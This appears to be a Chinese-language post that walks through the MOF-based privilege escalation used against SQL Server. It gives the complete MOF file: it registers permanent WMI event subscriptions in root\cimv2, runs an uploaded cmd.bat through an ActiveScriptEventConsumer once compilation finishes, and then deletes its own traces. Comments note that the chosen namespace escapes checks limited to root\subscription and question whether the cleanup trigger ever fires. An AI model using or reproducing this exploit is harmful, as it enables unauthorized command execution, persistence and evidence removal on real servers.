这个用于 SQL Server 提权的 MOF 只能执行 System32 目录下的文件，无法自定义路径：脚本里用的全是相对路径（cmd.bat 以及 wbem\mof\good\hBsBa.mof），它们相对于执行脚本的 WMI 宿主进程的工作目录解析，实际即 %SystemRoot%\System32。因此要先把需要运行的命令写进名为 cmd.bat 的批处理文件并上传到 System32 目录，再把下面的 MOF 以 hBsBa.mof 为文件名放到 wbem\mof 目录下等待 WMI 编译执行；清理脚本删除的正是 wbem\mof\good\hBsBa.mof，所以两个文件名都必须与脚本中硬编码的一致，否则执行或清理都不会发生。

注意：下面的 MOF 在 root\cimv2（而不是常见的 root\subscription）命名空间里注册了永久 WMI 事件订阅（__EventFilter / ActiveScriptEventConsumer / __FilterToConsumerBinding），这类对象是排查 WMI 持久化时的重点对象。
// Compile target. Every object below lands in root\cimv2, not in the
// root\subscription namespace where WMI-persistence checks usually look
// first, so enumeration limited to root\subscription will not see them.
#pragma namespace("\\\\.\\root\\cimv2")

// Marker class used only as an event source: the creation of an instance
// of it (last object in this file) is what fires the payload consumer.
class MyClass547
{
    [key] string Name;
};
// Consumer class that executes inline script text when an event is
// delivered to it. Declared here so the MOF is self-contained; the
// class is implemented by the provider registered just below.
// NOTE(review): the post describes the script as running as SYSTEM. The
// MOF itself does not choose that account -- it is whatever the WMI
// scripting-consumer host runs as on the target; confirm per platform.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key]      string Name;
    [not_null] string ScriptingEngine;
               string ScriptFileName;
    [template] string ScriptText;
               uint32 KillTimeout;
};

// Provider backing ActiveScriptEventConsumer.
instance of __Win32Provider as $P
{
    Name                  = "ActiveScriptEventConsumer";
    CLSID                 = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

// Registers $P as the provider for the consumer class declared above.
instance of __EventConsumerProviderRegistration
{
    Provider           = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};
// Payload consumer. On its event it launches cmd.bat through
// WScript.Shell.Run and then deletes its own trigger class, filter and
// consumer from root\cimv2. cmd.bat is a relative path, so it is found
// only if it sits in the WMI host process's working directory (the post
// says System32).
// NOTE(review): the script deletes MyClass547, instfilt and ASEC but never
// the __FilterToConsumerBinding $bind that joins them; whether WMI removes
// the dangling binding on its own is not something this file shows.
// Minor: `sv` is assigned without `var` (implicit JScript global).
Instance of ActiveScriptEventConsumer as $cons
{
    Name            = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText      = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};
// Cleanup consumer. Removes the compiled copy of this MOF that WMI keeps
// as wbem\mof\good\hBsBa.mof, the uploaded cmd.bat, and its own filter and
// consumer. Both file paths are relative, so the dropped MOF must have
// been named hBsBa.mof and the batch file cmd.bat for anything to happen.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name            = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText      = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Payload trigger: any new MyClass547 instance.
instance of __EventFilter as $Filt
{
    Name          = "instfilt";
    Query         = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Cleanup trigger: a Win32_Process named "cmd.bat" disappearing, polled
// every second.
// NOTE(review): Win32_Process.Name is the image name, and running a .bat
// via WScript.Shell.Run spawns cmd.exe, so a process literally named
// "cmd.bat" is unlikely to ever exist. If that holds on the target, this
// filter never matches, $cons2 never runs, and hBsBa.mof, cmd.bat, qndfilt
// and qndASEC all stay behind. Verify before relying on the cleanup.
instance of __EventFilter as $Filt2
{
    Name          = "qndfilt";
    Query         = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Wire payload trigger -> payload consumer.
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter   = $Filt;
};

// Wire cleanup trigger -> cleanup consumer.
instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter   = $Filt2;
};

// Creating this instance satisfies $Filt, so the payload runs as soon as
// the MOF finishes compiling.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};